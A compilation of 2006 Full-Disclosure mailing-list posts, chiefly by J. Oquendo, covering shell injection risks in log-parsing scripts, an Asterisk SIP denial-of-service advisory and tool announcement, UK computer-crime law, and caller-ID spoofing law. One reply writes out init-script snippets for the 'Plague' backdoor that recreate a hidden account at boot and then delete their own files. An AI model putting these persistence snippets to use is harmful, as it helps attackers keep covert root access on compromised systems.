FreeBSD ethos.disgraced.org 5.4-RELEASE-p14 FreeBSD 5.4-RELEASE-p14 #1:
Thu May 11 01:34:54 CDT 2006
[EMAIL PROTECTED]:/usr/obj/usr/src/sys/ETHOS i386
-bash2-2.05b$ sudo awk '{print $13}' /var/log/auth.log|sort -ru
57354
57340
57335
56253
55125
49211
40334
37188
3508
33875
33635
33454
32798
3137
2895
2638
2408
2301
2114
-
OpenBSD
# uname -a
OpenBSD hades.disgraced.org 4.0 GENERIC#1 i386
# awk '{print $13}' /var/log/authlog|grep \.|sort -ru
63.243.158.221
61.129.85.230
220.132.113.163
219.149.211.49
213.195.75.41
206.210.96.56
I don't believe the suggestion was ever that you had malicious
intent, but rather that you have very horrible coding security
habits.
This should have been stated to the list as opposed to You're
backdooring people
I'm disinclined to sort out which of your machines I can get root on
right now because you are running this script, but I would expect
that someone reading this mailing list is already on the way and
would strongly advise that you disable those cron jobs.
I'll give you addresses if you'd like to take a shot at it.
--
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net
The happiness of society is the end of government.
John Adams
smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
gabriel rosenkoetter wrote: On Mon, Nov 27, 2006 at 04:41:43PM -0500, J. Oquendo wrote: That specially crafted attempt would be a HUGE raping of TCP/IP. How do you supposed it would be possible for someone to insert 0wn3ed or any other variable outside of an IP address? That's impossible. Putting extra spaces in the log entry is easy. And extra spaces would do what... If the point is to insert a name someone in order to send out information from the 13th column in authlog, then I'll tell you what, you name the system it can happen on and I will personally apologize publicly. It is not doable. I'd have a better chance of hanging with Santa while I bang Angelina Jolie while Denise Richards watches me. -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
Michael Holstein wrote:
That specially crafted attempt would be a HUGE raping of TCP/IP. How do
you supposed it would be possible for someone to insert 0wn3ed or any
other variable outside of an IP address?
Remember the (in)famous quote ...that vulnerability is purely
theoretical...?
I think the point is you don't use $language to split a bunch of fields,
and then pipe them back through /bin/sh without making sure they're not
malicious.
Doesn't matter that you can't think of a way to make them malicious ..
somebody else will find one. It's safer to just assume it'll happen and
always sanitize variables before you {do_stuff;} with them.
(my $0.02)
~Mike.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
So I ask you too... Find me any Unix derivative that will allow someone
to pass a name, word, place, etc into the 13th column of authlog, then
bypass grep which is grep'ing out for decimals.
--
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net
The happiness of society is the end of government.
John Adams
smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DoS kiddiots can face 10 years in jail
[forwarded] Denial of service attackers face 10 years in jail http://www.zdnetasia.com/news/security/0,39044215,61966964,00.htm By Andy McCue Special to ZDNet Asia November 13 2006 Denial of service attackers in the United Kingdom now face up to 10 years in jail with updated computer crime laws coming into force this week as part of the new Police and Justice Act 2006. The long-overdue updating of the 1990 Computer Misuse Act also increases the sentence for hacking a computer from a maximum of six months to two years' imprisonment. Section three of the 1990 CMA is replaced by section 34 of the Police and Justice Act 2006, which now more explicitly covers denial of service attacks as unauthorized acts with intent to impair operation of a computer. The act says a person is guilty of an offence if at the time of any attack they have the intent to impair the operation of any computer, prevent or hinder access to any program or data held on a computer, or impair the operation of a program or the reliability of data. Confusion had arisen over whether denial of service attacks were covered in the original CMA in the case of a teenager originally cleared in 2005 of crashing the email server of his former employer by overwhelming it with an 'email bomb' containing millions of messages. That ruling was later overturned and David Lennon was found guilty earlier this year of breaking the CMA, and was sentenced to a two-month curfew. The new law also makes it an offence to supply or make available any software or tools that could be used to commit hacking or denial of service attacks, and those found guilty under this section of the act face up to two years in jail. As part of the Police and Justice Act 2006 the police IT organization Pito has been abolished and its functions will be taken over by the new National Policing Improvement Agency. New powers under the Act will give police the right to access passenger and crew data on any journeys within the United Kingdom or arriving in the United Kingdom. Andy McCue of Silicon.com reported from London. -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Locking down (L)AMP from XSSKiddiots
I was bored... www.infiltrated.net/modsecips.html -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Asterisk Local and Remote Denial of Service Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Product: Asterisk Open Source PBX Impact: Multiple Local and Remote Denials of Service Version(s): All versions prior to 1.2.13 Author: Jesus Oquendo echo @infiltrated|sed 's/^/sil/g;s/$/.net/g' I. BACKGROUND Asterisk is an Open Source PBX which runs on Linux, BSD, Solaris and MacOSX that provides all of the features in a standard PBX. Asterisk does voice over IP and can interoperate with almost all telephony equipment. II. DESCRIPTION A sequence of malformed (pre-defined) packets can cause different denial of services on Asterisk. The attack is both local and remote. These denial of services can range from the Asterisk server shutting down, channels being opened and filling up queues. Log file denials of service by filling space with errors and ranDumb messages. Voicemail space allocation being filled, and ICMP denials of service. III SOLUTION Versions 1.2.13 and greater are no longer vulnerable to the attack and users are urged to update to 1.2.13 or better. IV. SOURCE http://www.infiltrated.net/asteroid/asteroidv1.tar.gz V. POSSIBILITIES While the initial packet creation tool was tested on Asterisk, it was not targeted towards Asterisk but at the SIP protocol. Asterisk was used merely for Wireshark packet captures in order to re-create newer packets. The Asteroid SIP denial of service tool could also affect other products that run the SIP protocol including soft phones, other PBX's, etc. VI. MENTIONS Thanks to Kevin P. Flemming and the guys at Asterisk fixing this promptly. Dan York for getting people to pay attention. Tim Donahue for his Perl pointers, vgersh99 (aka vlad) for nawk pointers, PHV, Annihilannic, p5wizard, Anthony LaMantia, Tzafir Cohen, and the others on the Asterisk-Dev list. VII. TESTBED Tested on Solaris, FreeBSD, Linux (SuSE, CentOS, Gentoo, Debian) distributions running various versions Asterisk. VIII. CHECKSUMS $ md5 asteroidv1.tar.gz MD5 (asteroidv1.tar.gz) = b32c56ab4004d2a75109d9e8d824 $ sha1 asteroidv1.tar.gz SHA1 (asteroidv1.tar.gz) = 0345fc7e423bddb8d9aa5fae431c0715db70a879 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo echo @infiltrated|sed 's/^/sil/g;s/$/.net/g' http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 How a man plays the game shows something of his character - how he loses shows all - Mr. Luckey -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.3 (FreeBSD) iD8DBQFFRnM0h3J3NhODp0MRAu0NAJsFLdCKJgRqtjLs35GtXxRKNYNaLgCg8xxI zZUQr4YWe0BE8RHpvEYTyEI= =TLzd -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Asteroid SIP Denial of Service Tool
Asteroid is a SIP denial of service attack tools which affected older versions of Asterisk the Open Source PBX and may affect other products running the SIP protocol. There are thousands of custom (mis)crafted SIP packets which were sent to a older versions of Asterisk that caused errors stopping Asterisk. The packets were crafted based on packetdumps from Wireshark with flags set for pseudo-spoofing, ranDUMBized extensions, etc.. The purpose of the tool was to help me understand SIP security and Denials of Service attacks on the SIP protocol. Originally I had intended on testing out my nCite Session Border Controller but after watching nCite crash and burn on its own, it made little sense for me to point it at it. I have found that by sending a certain sequence of these packets, in a certain order, servers react differently. Sometimes it crashed faster, sometimes more extensions subscribed, sometimes voicemails were created and the list went on. Asterisk version 1.2.13 and better are now patched from this issue but there are other products it has not been tested on. The packets were butchered in Perl and called from a shell script since I had to manipulate packet sequences individually. This Proof of Concept program is released to the public under the hopes that individuals will find a useful purpose for assessing DoS vulnerabilities. It is unfortunate though that there are idiots who will use this lame tool for malicious purposes. Some vendors, CERT and other organizations were contacted as early as September 9th 2006 to address issues with their products. Most reacted quickly to get the fixes in order. Thanks to Kevin P. Flemming and the guys on Asterisk Dev for creating a thread on this. Dan York for getting some to pay attention. PSIRT at Cisco for looking into this, Tim Donahue for his perl pointers, vgersh99 (aka vlad) for nawk foo pointers, PHV, Annihilannic, p5wizard (segment!), and Henning Schulzrinne for taking a look at the tool during his seminars at Columbia. Also thanks to Anthony LaMantia, Tzafir Cohen, and the others on the dev list for tolerating my posts. Public apologies to Jay R. Ashworth for my mis-reading of the (Missed)Trust in Caller ID thread on VOIPSA ;) Coming 10/31/2006 http://www.infiltrated.net/asteroid/ -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo echo @infiltrated|sed 's/^/sil/g;s/$/.net/g' http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 How a man plays the game shows something of his character - how he loses shows all - Mr. Luckey ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Plague re-visited
[EMAIL PROTECTED] wrote:
Hello Rik,
and how on earth can you make root run that piece of code? Do you have
to specify it in the README section that it is mandatory to run that as
root in order the new application root will be installing to run as
expected?
If you need someone to spell out how this works and how it maintains an account
then you should unsubscribe from all security lists and search google for
pokemon, change your hobby, get out of this field. From the onset nothing
specified remote root access it stated proof of concept BACKDOOR if you
need the term defined for you, re-read the previous sentence in its entirety.
Indeed, it is hard to tell what it actually does... unless you open your
eyes and see sed 's/root/something/g' somewhere.
The purpose of me pondering this was a notion that one doesn't always need to
re-invent the wheel. Using standard commands, its actually easier and safer to
maintain a backdoor. If someone already rooted a machine, how does one maintain
that account without setting off bells and whistles. It's alot easier to whip
up little bits and pieces and have it precompile into one script, run itself,
and delete itself afterwards. There would be no trace of any all inclusive
backdoor programs. A snippet here, a snippet there all precompiling either on a
system startup or shutdown.
Either way, installing from hundreds of source files, can make even the
best sys admin to not notice that part of the source code of the
BACKDOOR-contagious application!
Really... Most system administrators don't even pay attention to log files.
Most system administrators are so caught up with every work, putting out fires,
configuring and maintaining systems they don't have time to check a 500gb drive
for a backdoor, and when they do, they're doing what running chkrootkit. Using
a method such as the one I described makes it much more difficult to detect a
backdoor. As for seeing the word root and raising a red flag, don't make me
laugh, see lines 2 and 4 below... Let's start in /etc/rc3.d...
echo file=`awk 'NR==59 {gsub(//,);print \$3}' /usr/include/paths.h`
K1firstfile
echo echo sed -n '1p' \$file|sed 's/[^:]*:/new_account_name:/' $file
K2nextfile
echo file2=`awk 'NR==74 {print \$8}' /usr/include/sysexits.h` K3anotherfile
echo sed -n '1p' \$file2|sed 's/[^:]*:/new_account_name:/'' $file2
K4endingfile
echo rm $file1 $file2 K5lastfileremove
Where one file depends on the next and so on and so forth. At the end of it all
the backdoor files are removed, yet on startup (or shutdown depending on how
its written), files are re-compiled and the account is recreated. The problem I
see with many administrators and users nowadays, are they're not totally clued
in... So you see file=`awk 'NR==59 {gsub(//,);print \$3}'
/usr/include/paths.h` ... Unless you have K1firstfile checksummed, most
wouldn't give it a second look.
bad PLAGUE! bad intentions! bad people possibly putting that where root is
messing.
I hope that comment was sarcasm and not stupidity...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
How a man plays the game shows something of his
character - how he loses shows all - Mr. Luckey
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Plague Proof of Concept Linux backdoor
Plague is an odd proof of concept backdoor keeping tool based on the premise of using existing system files and commands to keep and maintain a backdoor on Linux systems. I could have modified this for BSD, Solaris, etc., but I didn't feel like doing the work... http://www.infiltrated.net/plague -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo echo @infiltrated|sed 's/^/sil/g;s/$/.net/g' http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 How a man plays the game shows something of his character - how he loses shows all - Mr. Luckey ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Hacker Pumpking Carving Contest
RSnake wrote:
Sorry for the spam but I wanted to get this out to as many haX0rs as
possible with as few emails as possible. It's time to get in the
spirit. It's time for a hacker pumpkin carving contest. I've given you
two weeks notice so no one can complain about not hearing about it in
time. Info at the following URL: http://ha.ckers.org/hacker-pumpkins/
-RSnake
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Does this count?
lynx -dump http://infiltrated.net/foo|awk '{a[i++]=$0} END {for (j=i-1;
j=0;) print a[j--] }'|sed 's/\$/ /g;s/S/U/g'|awk '!($0 in a) {a[$0];print}'
--
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net
The happiness of society is the end of government.
John Adams
smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Hacker Pumpking Carving Contest
RSnake wrote:
Sorry for the spam but I wanted to get this out to as many haX0rs as
possible with as few emails as possible. It's time to get in the
spirit. It's time for a hacker pumpkin carving contest. I've given you
two weeks notice so no one can complain about not hearing about it in
time. Info at the following URL: http://ha.ckers.org/hacker-pumpkins/
-RSnake
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Uh... Windows (l)users need not apply... Retardo Linux/BSD users try:
lynx -dump http://infiltrated.net/foo|\
awk '{a[i++]=$0} END {for (j=i-1; j=0;) print a[j--] }'|\
sed 's/\$/ /g;s/S/U/g'|\
awk '!($0 in a) {a[$0];print}'
;) Long time Rs
--
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net
The happiness of society is the end of government.
John Adams
smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fallacies on Truths in Caller ID scam
Ajay Pal Singh Atwal wrote: Getting back to some very small points here... Correction: Rawalpindi is not in India. Ralwapindi was used cause it's the only place that came to my mind at the moment, Pakistan, India it was an example. If the call is from Dell, then does it matter, if the office is in India or Rawalpindi. 1800GO2DELL represents dell. Yes it does matter to me where someone is located when I am speaking to them. It matters for the sake of accountability. YOU may not see nothing wrong with someone having your information at their fingertips, but I want to know who, what, where, when and why someone is doing ANYTHING with my information. Or haven't you been following news: Indian Outsourcing Firms Downplay Fraud Concerns http://www.crmbuyer.com/story/PZCY8ZqRWY32gK/Indian-Outsourcing-Firms-Downplay-Fraud-Concerns.xhtml Fraud Reports Worry Indian Outsourcing Firms http://www.ecommercetimes.com/story/8zIZdp07IuYkrW/Fraud-Reports-Worry-Indian-Outsourcing-Firms.xhtml etc http://tinyurl.com/g4mg5 I don't care if its India, China, Pakistan, the North or South Pole, Dell in this example should follow US laws especially since they're located here. It can't be a single sided law it has to apply to all bottom line. And in that case www.talkety.com is doing something similar from Germany (?). And you can misuse their service to have fun making prank calls to people from their own numbers. I don't care about Germany there fellow, this post was regarding US LAWS and I happened to mention a US COMPANY not a Germany one. Ich scheiß' d'rauf! (No really) Just something for though... ahem.. Next argument? -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fallacies on Truths in Caller ID scam
Getting back to some points here... So with let's say a vendor getting back to me on a problem I have, let the company be Dell for this example. Dell has their outsourced vendor from Ralwapindi India or somewhere in the vicinity call me, my caller ID shows 1800GO2DELL, in this scenario either way you want to cut it, Dell is circumventing the Truth in Caller ID Act. As for telco's doing what they do greasing pockets, this has gone down since the evolution of business, money talks BS walks bottom line. Vladis to further iterate on your fallacious point: The prosecutor can charge *each and every person involved* who is both a) within the US and b) took an identifiable action which lead to the event. Let's create SpoofmyCallerIDforKicks.com and make a call (abbreviate the site to SCK.com for this example): Spoofer(2125551212) -- SCK.com -- CallReceiver (4085551212) SCK.com (posts call via Asterisk) -- routes through Russia to Level3 -- through Verizon -- through BellSouth -- Victim SCK is in the Moldovia absolved from US laws. Should BellSouth bear the burden of the illegal action? This is what your statement is telling me. BellSouth, Verizon and Level3 are all to blame and since they cannot prosecute SCK being they're outside of US laws, you're inferring the US government can/will/should/have_the_option_to go after those responsible. Either way you want to cut this, Verizon, BellSouth and Level3 are as much to blame for not taking the proper checks. Just something for though... -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 sil infiltrated . net http://www.infiltrated.net How a man plays the game shows something of his character - how he loses shows all - Mr. Luckey ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Truths in Truth in Caller ID Act
So the United States government wants to pass the Truth in Caller ID act. Humorously it will do little do deter criminals from spoofing their caller ID and scamming innocent victims. Here is the rule/law followed by why it will fail: It shall be unlawful for any person within the United States, in connection with any telecommunications service or VOIP service, to cause any caller identification service to transmit misleading or inaccurate caller identification information, with the intent to defraud or cause harm. Re-read it a few times and let some common sense kick in. unlawful for any person within the United States, in connection with any telecommunications service or VOIP service, to cause any caller identification service to transmit misleading or inaccurate caller identification information What in this bill exactly deters someone from abroad to continue their activities? Firstly they're not bound by U.S. laws, secondly if their servers are abroad those servers are in their lawful means to do what is legally appropriate for their location. Now argumentatively how will the United States seek to prosecute say a telemarketer from using a service abroad to traverse back into the U.S.? Let's re-read the letter of the law again shall we? unlawful for any person within the United States, etc., etc., to cause any caller identification, etc., etc. So how does caller ID change, is it cause by the telemarketer, the server sending out the caller ID information, or the provider of that server. Obviously the telemarketer led the server to change the information, but ultimately the provider dished out the number, hence the provider being the true culprit. The more I read about this law/rule/prohibition, the more I scratch my head at it. So let's now see how the government intends on tracking someone shall we? CallerIDBusterFoobar.com is a server located in Moscow. They're hosted there, their provider is their, their uplink is in Russia, etc. Joe Smith is a scumbag thief interested in stealing the credit card information of a few good men. He lives in Boondock Arizona and spends much too much time thinking up scams. He signs up for an account at CallerIDBusterFoobar.com, assigns 800-DISCOVER as his caller ID and proceeds to scam countless people out of their information. With this information he sets up fradulent drops and pickups somewhere in Moldovia. How will U.S. authorities track him down? They won't. They don't have access to the servers in Russia for starters, secondly how many people are reporting these crimes. Alright, let's be fair for a moment, someone at Discover discovers that the call actually originated from Russia. So what? Unless the foreign country is cooperating with U.S. authorities, there is little the United States government with all their so called legislation would be able to do. Now let's take it a step further, Joe Smith decided to use Privoxy with a WiFi phone from an open network. He managed to steal a VoIP account while scanning a class A for port 5060 and leveraged someone's information. He always has used Tor and Privoxy on his personal distro of Linux on a CD so he knows that there will be no residue from his crimes due to him using this CD on this machine so he is scott free technologically. How does the United States intend on stopping him again? I get it now, since the United States government in all of their mighty wisdom is passing this bill it is only obvious that criminals are going to respect U.S. laws, I mean after all those in government follow their own laws so why shouldn't a criminal. Comments, criticism? -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 sil infiltrated . net http://www.infiltrated.net How a man plays the game shows something of his character - how he loses shows all - Mr. Luckey ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
